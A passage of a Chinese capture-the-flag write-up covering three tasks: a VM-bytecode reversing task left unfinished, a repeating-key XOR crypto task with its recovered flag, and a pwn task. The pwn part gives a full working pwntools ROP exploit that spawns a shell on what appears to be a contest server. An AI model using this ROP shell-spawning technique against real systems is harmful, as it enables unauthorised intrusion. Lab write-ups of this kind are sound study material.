2855, 2895, 2894, 2895, 7, 7, 7, 7, 7, 7, 2855, 2855, 2856, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6647, 6647, 7, 7, 7, 6647, 1, 1, 7, 7, 7, 6602, 2941, 2941, 7, 7, 7, 0, 2944, 0, 0, 6602, 6602, 2942, 6609, 6609, 2943, 2956, 2956, 7, 7, 7, 0, 2959, 0, 0, 6602, 6602, 2957, 2943, 2943, 2958, 2957, 2958, 7, 7, 7, 7, 7, 7, 2943, 2980, 2980, 7, 7, 7, 0, 2983, 0, 0, 6609, 6609, 2981, 2942, 2942, 2982, 2981, 2982, 7, 7, 7, 7, 7, 7, 2942, 2942, 2943, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6648, 6648, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 
1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 3202, 3202, 7, 7, 7, 0, 3205, 0, 0, 6602, 6602, 3203, 6611, 6611, 3204, 3217, 3217, 7, 7, 7, 0, 3220, 0, 0, 6602, 6602, 3218, 3204, 3204, 3219, 3218, 3219, 7, 7, 7, 7, 7, 7, 3204, 3241, 3241, 7, 7, 7, 0, 3244, 0, 0, 6611, 6611, 3242, 3203, 3203, 3243, 3242, 3243, 7, 7, 7, 7, 7, 7, 3203, 3203, 3204, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3277, 3277, 7, 7, 7, 0, 3280, 0, 0, 6649, 6649, 3278, 6628, 6628, 3279, 3292, 3292, 7, 7, 7, 0, 3295, 0, 0, 6649, 6649, 3293, 3279, 3279, 3294, 3293, 3294, 7, 7, 7, 7, 7, 7, 3279, 3316, 3316, 7, 7, 7, 0, 3319, 0, 0, 6628, 6628, 3317, 3278, 3278, 3318, 3317, 3318, 7, 7, 7, 7, 7, 7, 3278, 3278, 3279, 7, 7, 7, 6602, 3346, 3346, 7, 7, 7, 0, 3349, 0, 0, 6602, 6602, 3347, 6604, 6604, 3348, 3361, 3361, 7, 7, 7, 0, 3364, 0, 0, 6602, 6602, 3362, 3348, 3348, 3363, 3362, 3363, 7, 7, 7, 7, 7, 7, 3348, 3385, 3385, 7, 7, 7, 0, 3388, 0, 0, 6604, 6604, 3386, 3347, 3347, 3387, 3386, 3387, 7, 7, 7, 7, 7, 7, 3347, 3347, 3348, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3421, 3421, 7, 7, 7, 0, 3424, 0, 0, 6650, 6650, 3422, 6623, 6623, 3423, 3436, 3436, 7, 7, 7, 0, 3439, 0, 0, 6650, 6650, 3437, 3423, 3423, 3438, 3437, 3438, 7, 7, 7, 7, 7, 7, 3423, 3460, 3460, 7, 7, 7, 0, 3463, 0, 0, 6623, 6623, 3461, 3422, 3422, 3462, 3461, 3462, 7, 7, 7, 7, 7, 7, 3422, 3422, 3423, 7, 7, 7, 6602, 3490, 3490, 7, 7, 7, 0, 3493, 0, 0, 6602, 6602, 3491, 6616, 6616, 3492, 3505, 3505, 7, 7, 7, 0, 3508, 0, 0, 6602, 6602, 3506, 3492, 3492, 3507, 3506, 3507, 7, 7, 7, 7, 7, 7, 3492, 3529, 3529, 7, 7, 7, 0, 3532, 0, 0, 6616, 6616, 3530, 3491, 3491, 3531, 3530, 3531, 7, 7, 7, 7, 7, 7, 3491, 3491, 3492, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6651, 6651, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 
7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 3751, 3751, 7, 7, 7, 0, 3754, 0, 0, 6602, 6602, 3752, 6625, 6625, 3753, 3766, 3766, 7, 7, 7, 0, 3769, 0, 0, 6602, 6602, 3767, 3753, 3753, 3768, 3767, 3768, 7, 7, 7, 7, 7, 7, 3753, 3790, 3790, 7, 7, 7, 0, 3793, 0, 0, 6625, 6625, 3791, 3752, 3752, 3792, 3791, 3792, 7, 7, 7, 7, 7, 7, 3752, 3752, 3753, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6652, 6652, 7, 7, 7, 6652, 1, 1, 7, 7, 7, 6602, 3838, 3838, 7, 7, 7, 0, 3841, 0, 0, 6602, 6602, 3839, 6613, 6613, 3840, 3853, 3853, 7, 7, 7, 0, 3856, 0, 0, 6602, 6602, 3854, 3840, 3840, 3855, 3854, 3855, 7, 7, 7, 7, 7, 7, 3840, 3877, 3877, 7, 7, 7, 0, 3880, 0, 0, 6613, 6613, 3878, 3839, 3839, 3879, 3878, 3879, 7, 7, 7, 7, 7, 7, 3839, 3839, 3840, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3913, 3913, 7, 7, 7, 0, 3916, 0, 0, 6653, 6653, 3914, 6612, 6612, 3915, 3928, 3928, 7, 7, 7, 0, 3931, 0, 0, 6653, 6653, 3929, 3915, 3915, 3930, 3929, 3930, 7, 7, 7, 7, 7, 7, 3915, 3952, 3952, 7, 7, 7, 0, 3955, 0, 0, 6612, 6612, 3953, 3914, 3914, 3954, 3953, 3954, 7, 7, 7, 7, 7, 7, 3914, 3914, 3915, 7, 7, 7, 6602, 3982, 3982, 7, 7, 7, 0, 3985, 0, 0, 6602, 6602, 3983, 6626, 6626, 3984, 3997, 3997, 7, 7, 7, 0, 4000, 0, 0, 6602, 6602, 3998, 3984, 3984, 3999, 3998, 3999, 7, 7, 7, 7, 7, 7, 3984, 4021, 4021, 7, 7, 7, 0, 4024, 0, 0, 6626, 6626, 4022, 3983, 3983, 4023, 4022, 4023, 7, 7, 7, 7, 7, 7, 3983, 3983, 3984, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6654, 6654, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 
1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 4243, 4243, 7, 7, 7, 0, 4246, 0, 0, 6602, 6602, 4244, 6607, 6607, 4245, 4258, 4258, 7, 7, 7, 0, 4261, 0, 0, 6602, 6602, 4259, 4245, 4245, 4260, 4259, 4260, 7, 7, 7, 7, 7, 7, 4245, 4282, 4282, 7, 7, 7, 0, 4285, 0, 0, 6607, 6607, 4283, 4244, 4244, 4284, 4283, 4284, 7, 7, 7, 7, 7, 7, 4244, 4244, 4245, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6655, 6655, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 4504, 4504, 7, 7, 7, 0, 4507, 0, 0, 6602, 6602, 4505, 6627, 6627, 4506, 4519, 4519, 7, 7, 7, 0, 4522, 0, 0, 6602, 6602, 4520, 4506, 4506, 4521, 4520, 4521, 7, 7, 7, 7, 7, 7, 4506, 4543, 4543, 7, 7, 7, 0, 4546, 0, 0, 6627, 6627, 4544, 4505, 4505, 4545, 4544, 4545, 7, 7, 7, 7, 7, 7, 4505, 4505, 4506, 7, 7, 7, 6602, 
6602, 454, 7, 7, 7, 454, 4579, 4579, 7, 7, 7, 0, 4582, 0, 0, 6656, 6656, 4580, 6619, 6619, 4581, 4594, 4594, 7, 7, 7, 0, 4597, 0, 0, 6656, 6656, 4595, 4581, 4581, 4596, 4595, 4596, 7, 7, 7, 7, 7, 7, 4581, 4618, 4618, 7, 7, 7, 0, 4621, 0, 0, 6619, 6619, 4619, 4580, 4580, 4620, 4619, 4620, 7, 7, 7, 7, 7, 7, 4580, 4580, 4581, 7, 7, 7, 6602, 4648, 4648, 7, 7, 7, 0, 4651, 0, 0, 6602, 6602, 4649, 6628, 6628, 4650, 4663, 4663, 7, 7, 7, 0, 4666, 0, 0, 6602, 6602, 4664, 4650, 4650, 4665, 4664, 4665, 7, 7, 7, 7, 7, 7, 4650, 4687, 4687, 7, 7, 7, 0, 4690, 0, 0, 6628, 6628, 4688, 4649, 4649, 4689, 4688, 4689, 7, 7, 7, 7, 7, 7, 4649, 4649, 4650, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6657, 6657, 7, 7, 7, 6657, 1, 1, 7, 7, 7, 6602, 4735, 4735, 7, 7, 7, 0, 4738, 0, 0, 6602, 6602, 4736, 6614, 6614, 4737, 4750, 4750, 7, 7, 7, 0, 4753, 0, 0, 6602, 6602, 4751, 4737, 4737, 4752, 4751, 4752, 7, 7, 7, 7, 7, 7, 4737, 4774, 4774, 7, 7, 7, 0, 4777, 0, 0, 6614, 6614, 4775, 4736, 4736, 4776, 4775, 4776, 7, 7, 7, 7, 7, 7, 4736, 4736, 4737, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 4810, 4810, 7, 7, 7, 0, 4813, 0, 0, 6658, 6658, 4811, 6632, 6632, 4812, 4825, 4825, 7, 7, 7, 0, 4828, 0, 0, 6658, 6658, 4826, 4812, 4812, 4827, 4826, 4827, 7, 7, 7, 7, 7, 7, 4812, 4849, 4849, 7, 7, 7, 0, 4852, 0, 0, 6632, 6632, 4850, 4811, 4811, 4851, 4850, 4851, 7, 7, 7, 7, 7, 7, 4811, 4811, 4812, 7, 7, 7, 6602, 4879, 4879, 7, 7, 7, 0, 4882, 0, 0, 6602, 6602, 4880, 6630, 6630, 4881, 4894, 4894, 7, 7, 7, 0, 4897, 0, 0, 6602, 6602, 4895, 4881, 4881, 4896, 4895, 4896, 7, 7, 7, 7, 7, 7, 4881, 4918, 4918, 7, 7, 7, 0, 4921, 0, 0, 6630, 6630, 4919, 4880, 4880, 4920, 4919, 4920, 7, 7, 7, 7, 7, 7, 4880, 4880, 4881, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6659, 6659, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 
6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 5140, 5140, 7, 7, 7, 0, 5143, 0, 0, 6602, 6602, 5141, 6620, 6620, 5142, 5155, 5155, 7, 7, 7, 0, 5158, 0, 0, 6602, 6602, 5156, 5142, 5142, 5157, 5156, 5157, 7, 7, 7, 7, 7, 7, 5142, 5179, 5179, 7, 7, 7, 0, 5182, 0, 0, 6620, 6620, 5180, 5141, 5141, 5181, 5180, 5181, 7, 7, 7, 7, 7, 7, 5141, 5141, 5142, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 5215, 5215, 7, 7, 7, 0, 5217, 0, 5216, 5216, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 5505, 5505, 7, 7, 7, 0, 5508, 5708, 5574, 5514, 5514, 7, 7, 7, 0, 5517, 0, 0, 5523, 5523, 7, 7, 7, 0, 5526, 0, 0, 5507, 5507, 5524, 8, 8, 5525, 5524, 5525, 7, 7, 7, 7, 7, 7, 5515, 8, 8, 5516, 5550, 5550, 7, 7, 7, 0, 5553, 0, 0, 5506, 5506, 5551, 5516, 5516, 5552, 
5551, 5552, 7, 7, 7, 7, 7, 7, 5516, 5515, 5516, 7, 7, 7, 0, 6669, 6669, 7, 7, 7, 3, 5586, 5586, 7, 7, 7, 0, 5588, 1, 5587, 5587, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5606, 5606, 7, 7, 7, 0, 5608, 1, 5607, 5607, 7, 7, 7, 4, 6664, 6664, 7, 7, 7, 3, 5626, 5626, 7, 7, 7, 0, 5628, 1, 5627, 5627, 7, 7, 7, 4, 6683, 6683, 7, 7, 7, 3, 5646, 5646, 7, 7, 7, 0, 5648, 1, 5647, 5647, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 5666, 5666, 7, 7, 7, 0, 5668, 1, 5667, 5667, 7, 7, 7, 4, 6680, 6680, 7, 7, 7, 3, 5686, 5686, 7, 7, 7, 0, 5688, 1, 5687, 5687, 7, 7, 7, 4, 5700, 5700, 7, 7, 7, 0, 5702, 65535, 5701, 5701, 7, 7, 7, 0, 6673, 6673, 7, 7, 7, 3, 5720, 5720, 7, 7, 7, 0, 5722, 1, 5721, 5721, 7, 7, 7, 4, 6664, 6664, 7, 7, 7, 3, 5740, 5740, 7, 7, 7, 0, 5742, 1, 5741, 5741, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5760, 5760, 7, 7, 7, 0, 5762, 1, 5761, 5761, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5780, 5780, 7, 7, 7, 0, 5782, 1, 5781, 5781, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 5800, 5800, 7, 7, 7, 0, 5802, 1, 5801, 5801, 7, 7, 7, 4, 6677, 6677, 7, 7, 7, 3, 5820, 5820, 7, 7, 7, 0, 5822, 1, 5821, 5821, 7, 7, 7, 4, 6671, 6671, 7, 7, 7, 3, 5840, 5840, 7, 7, 7, 0, 5842, 1, 5841, 5841, 7, 7, 7, 4, 6680, 6680, 7, 7, 7, 3, 5860, 5860, 7, 7, 7, 0, 5862, 1, 5861, 5861, 7, 7, 7, 4, 6678, 6678, 7, 7, 7, 3, 5880, 5880, 7, 7, 7, 0, 5882, 1, 5881, 5881, 7, 7, 7, 4, 6662, 6662, 7, 7, 7, 3, 5900, 5900, 7, 7, 7, 0, 5902, 1, 5901, 5901, 7, 7, 7, 4, 6665, 6665, 7, 7, 7, 3, 5920, 5920, 7, 7, 7, 0, 5922, 1, 5921, 5921, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 5940, 5940, 7, 7, 7, 0, 5942, 1, 5941, 5941, 7, 7, 7, 4, 6676, 6676, 7, 7, 7, 3, 5960, 5960, 7, 7, 7, 0, 5962, 1, 5961, 5961, 7, 7, 7, 4, 6678, 6678, 7, 7, 7, 3, 5980, 5980, 7, 7, 7, 0, 5982, 1, 5981, 5981, 7, 7, 7, 4, 6662, 6662, 7, 7, 7, 3, 6000, 6000, 7, 7, 7, 0, 6002, 1, 6001, 6001, 7, 7, 7, 4, 6665, 6665, 7, 7, 7, 3, 6020, 6020, 7, 7, 7, 0, 6022, 1, 6021, 6021, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 6040, 6040, 7, 7, 7, 0, 6042, 1, 6041, 6041, 7, 7, 7, 4, 6681, 6681, 7, 
7, 7, 3, 6060, 6060, 7, 7, 7, 0, 6062, 1, 6061, 6061, 7, 7, 7, 4, 6635, 6635, 7, 7, 7, 3, 6080, 6080, 7, 7, 7, 0, 6082, 1, 6081, 6081, 7, 7, 7, 4, 6636, 6636, 7, 7, 7, 3, 6100, 6100, 7, 7, 7, 0, 6102, 1, 6101, 6101, 7, 7, 7, 4, 6637, 6637, 7, 7, 7, 3, 6120, 6120, 7, 7, 7, 0, 6122, 1, 6121, 6121, 7, 7, 7, 4, 6638, 6638, 7, 7, 7, 3, 6140, 6140, 7, 7, 7, 0, 6142, 1, 6141, 6141, 7, 7, 7, 4, 6639, 6639, 7, 7, 7, 3, 6160, 6160, 7, 7, 7, 0, 6162, 1, 6161, 6161, 7, 7, 7, 4, 6640, 6640, 7, 7, 7, 3, 6180, 6180, 7, 7, 7, 0, 6182, 1, 6181, 6181, 7, 7, 7, 4, 6641, 6641, 7, 7, 7, 3, 6200, 6200, 7, 7, 7, 0, 6202, 1, 6201, 6201, 7, 7, 7, 4, 6642, 6642, 7, 7, 7, 3, 6220, 6220, 7, 7, 7, 0, 6222, 1, 6221, 6221, 7, 7, 7, 4, 6643, 6643, 7, 7, 7, 3, 6240, 6240, 7, 7, 7, 0, 6242, 1, 6241, 6241, 7, 7, 7, 4, 6644, 6644, 7, 7, 7, 3, 6260, 6260, 7, 7, 7, 0, 6262, 1, 6261, 6261, 7, 7, 7, 4, 6645, 6645, 7, 7, 7, 3, 6280, 6280, 7, 7, 7, 0, 6282, 1, 6281, 6281, 7, 7, 7, 4, 6646, 6646, 7, 7, 7, 3, 6300, 6300, 7, 7, 7, 0, 6302, 1, 6301, 6301, 7, 7, 7, 4, 6647, 6647, 7, 7, 7, 3, 6320, 6320, 7, 7, 7, 0, 6322, 1, 6321, 6321, 7, 7, 7, 4, 6648, 6648, 7, 7, 7, 3, 6340, 6340, 7, 7, 7, 0, 6342, 1, 6341, 6341, 7, 7, 7, 4, 6649, 6649, 7, 7, 7, 3, 6360, 6360, 7, 7, 7, 0, 6362, 1, 6361, 6361, 7, 7, 7, 4, 6650, 6650, 7, 7, 7, 3, 6380, 6380, 7, 7, 7, 0, 6382, 1, 6381, 6381, 7, 7, 7, 4, 6651, 6651, 7, 7, 7, 3, 6400, 6400, 7, 7, 7, 0, 6402, 1, 6401, 6401, 7, 7, 7, 4, 6652, 6652, 7, 7, 7, 3, 6420, 6420, 7, 7, 7, 0, 6422, 1, 6421, 6421, 7, 7, 7, 4, 6653, 6653, 7, 7, 7, 3, 6440, 6440, 7, 7, 7, 0, 6442, 1, 6441, 6441, 7, 7, 7, 4, 6654, 6654, 7, 7, 7, 3, 6460, 6460, 7, 7, 7, 0, 6462, 1, 6461, 6461, 7, 7, 7, 4, 6655, 6655, 7, 7, 7, 3, 6480, 6480, 7, 7, 7, 0, 6482, 1, 6481, 6481, 7, 7, 7, 4, 6656, 6656, 7, 7, 7, 3, 6500, 6500, 7, 7, 7, 0, 6502, 1, 6501, 6501, 7, 7, 7, 4, 6657, 6657, 7, 7, 7, 3, 6520, 6520, 7, 7, 7, 0, 6522, 1, 6521, 6521, 7, 7, 7, 4, 6658, 6658, 7, 7, 7, 3, 6540, 6540, 7, 7, 7, 0, 6542, 1, 6541, 6541, 
7, 7, 7, 4, 6659, 6659, 7, 7, 7, 3, 6560, 6560, 7, 7, 7, 0, 6562, 1, 6561, 6561, 7, 7, 7, 4, 6682, 6682, 7, 7, 7, 3, 6580, 6580, 7, 7, 7, 0, 6582, 1, 6581, 6581, 7, 7, 7, 4, 6594, 6594, 7, 7, 7, 0, 6596, 65535, 6595, 6595, 7, 7, 7, 0, 0, 2, 70, 18, 87, 24, 216, 154, 96, 32, 99, 228, 164, 103, 40, 41, 234, 106, 43, 46, 32815, 124, 113, 32818, 60, 51, 53, 54, 62, 126, 123, 32828, 190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 117, 74, 108, 114, 111, 97, 80, 115, 119, 87, 100, 116, 103, 67, 84, 83, 58, 99, 70, 101, 33, 123, 125, 110, 0]
# Trace the VM program held in ``vmc`` one instruction at a time.
print((len(vmc)))

# Prepend 300 zero cells, moving every original element up by 300 indices.
# Presumably this makes the absolute addresses stored in the bytecode line up
# with list indices -- confirm against the binary's memory layout.
vmc[:0] = [0] * 300

# Cell 0 is used as the program counter; start at the first original element.
vmc[0] = 300

print(vmc[0x1c6])

while True:
    pc = vmc[0]
    if pc > 6385:
        break

    # One instruction is three consecutive cells: two source addresses and a
    # destination address.
    src_a = vmc[pc]
    src_b = vmc[pc + 1]
    dst = vmc[pc + 2]
    print(pc, [hex(src_a), hex(src_b), hex(dst)])

    # Advance the counter before the store: a destination of 0 overwrites the
    # counter, so such an instruction acts as a jump.
    vmc[0] += 3

    # The only operation is NOT(mem[a] | mem[b]).
    result = qufan(vmc[src_a] | vmc[src_b])
    vmc[dst] = result

    # Cell 1 receives the result rotated left by one.
    # NOTE(review): bit=8 is passed although qufan returns 16-bit values, so
    # the helper rotates over however many digits the value needs -- confirm
    # this matches the real VM.
    vmc[1] = circular_shift_left(result, 1, 8)
    print(vmc[1])

根据提取出的执行流可以分析出三个主要的数据操作:
1.input_value^static_value_1^static_value_2
2.(input_value ROL 15)^static_value
3.input_value^static_value

最后等官方wp

Crypto

crypto-xor2

签到题二号(确信

from secret import flag

key = "xxxx"  # not real key

# Repeating-key XOR: character i of the flag is XORed with key[i % 4], so the
# same four key characters are reused for the whole message. Four known
# plaintext characters at a known position are enough to recover the key.
cipher = "".join(chr(ord(c) ^ ord(key[i % 4])) for i, c in enumerate(flag))

with open("cipher", "w") as f:
    f.write(cipher)

就是非常普通的逐位异或
题目给出了flag格式,显然明文前四位是"flag"
因为 c = m ⊕ k,所以 k = c ⊕ m:把明文前四位和密文前四位异或一下就可以得到key了
没错,key就是”xxxx”
“not real key”

# XOR is its own inverse, so applying the same repeating four-character key
# to the ciphertext yields the plaintext again.
key = "xxxx"

# NOTE(review): the file is read in text mode, so decoding and newline
# translation are applied to the ciphertext before the XOR -- confirm this
# round-trips on the platform that wrote the file.
with open("cipher", "r") as f:
    cipher = f.read()

m = "".join(chr(ord(ch) ^ ord(key[pos % 4])) for pos, ch in enumerate(cipher))
print(m)

得到flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}

Pwn

jmp_rsp

image.png
静态链接文件。
检查保护:
image.png
IDA分析,存在栈溢出
image.png
没有提供system函数和/bin/sh字符串,又是个静态链接文件,考虑构造execve("/bin/sh",0,0)来获得shell。
利用ROPgadget找到一些可用的gadget:

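# Gadget addresses found with ROPgadget in the statically linked binary.
pop_rdi = 0x400696
pop_rsi = 0x410173
pop_rdx = 0x449395
pop_rax = 0x415174
syscall = 0x40120c
ret = 0x400416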

思路:先调用 read 函数在 bss 段写入 “/bin/sh” 字符串,然后布置好 rax(execve的系统调用号)、rdi(”/bin/sh”的地址)、rsi(0) 和 rdx(0) 后通过 syscall 调用 execve(“/bin/sh”,0,0)。

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

# Local run for debugging:
# p = process('./jmp_rsp')
p = remote('47.106.122.102', 44672)

# Fixed addresses inside the statically linked binary. The chain only works
# because these code addresses are constant and the return address can be
# overwritten unchecked; a stack canary or a randomised load address would
# invalidate it as written.
pop_rdi = 0x400696
pop_rsi = 0x410173
pop_rdx = 0x449395
pop_rax = 0x415174
main = 0x400B5D
syscall = 0x40120c
read = 0x449380
bss_addr = 0x6BC820
ret = 0x400416

# Filler placed in front of the first return address in both stages.
padding = b'a' * 136

# Stage 1: read(0, bss_addr, 8) stores the string in .bss, then control
# returns to main so the overflow can be triggered a second time.
stage1_words = [pop_rdi, 0, pop_rsi, bss_addr, pop_rdx, 0x8, read, main]
stage1 = padding + b''.join(p64(word) for word in stage1_words)
p.sendline(stage1)
sleep(1)
p.send(b'/bin/sh\x00')
# gdb.attach(p)
# pause()

# Stage 2: execve(bss_addr, 0, 0) through a raw syscall, with rax = 0x3b.
# The leading bare `ret` is presumably there for stack alignment -- confirm.
stage2_words = [ret, pop_rdi, bss_addr, pop_rsi, 0, pop_rdx, 0, pop_rax, 0x3b, syscall]
stage2 = padding + b''.join(p64(word) for word in stage2_words)
p.sendline(stage2)

p.interactive()

6036d63886da933fb7d19ecc01495e1.png
由于栈上没有开保护,可以执行shellcode,所以还有另一种解法,方法参考https://www.yuque.com/cyberangel/rg9gdm/bxq173